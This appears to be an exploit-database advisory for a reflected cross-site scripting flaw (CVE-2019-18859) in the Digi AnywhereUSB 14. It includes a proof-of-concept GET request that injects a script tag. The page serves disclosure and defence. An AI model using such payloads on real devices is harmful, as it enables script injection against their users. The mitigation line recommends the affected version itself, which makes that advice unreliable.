Digi AnywhereUSB 14 - Reflective Cross-Site Scripting

vendor:

Digi AnywhereUSB 14

by:

Raspina Net Pars Group

6.1

CVSS

MEDIUM

Reflective Cross-Site Scripting

CWE

Product Name: Digi AnywhereUSB 14

Affected Version From: 1

Affected Version To: 1.93.21.19

Patch Exists: YES

Related CWE: CVE-2019-18859

CPE: h:digi:anywhereusb_14:1.93.21.19

Metasploit:

Other Scripts:

Platforms Tested:

2019

Digi AnywhereUSB 14 – Reflective Cross-Site Scripting

The Digi AnywhereUSB 14 device is vulnerable to a reflective cross-site scripting (XSS) attack. By sending a specially crafted GET request, an attacker can inject and execute malicious script code on the target system, potentially leading to unauthorized access or data theft.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Digi AnywhereUSB 14 device to version 1.93.21.19 or later. Additionally, it is advised to implement proper input validation and output encoding to prevent XSS attacks.

Source

Exploit-DB raw data:

# Exploit Title: Digi AnywhereUSB 14 - Reflective Cross-Site Scripting
# Date: 2019-11-10
# Exploit Author: Raspina Net Pars Group
# Vendor Homepage: https://www.digi.com/products/networking/usb-connectivity/usb-over-ip/awusb
# Version: 1.93.21.19
# CVE : CVE-2019-18859

# PoC

GET //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


# Author Website: HTTPS://RNPG.info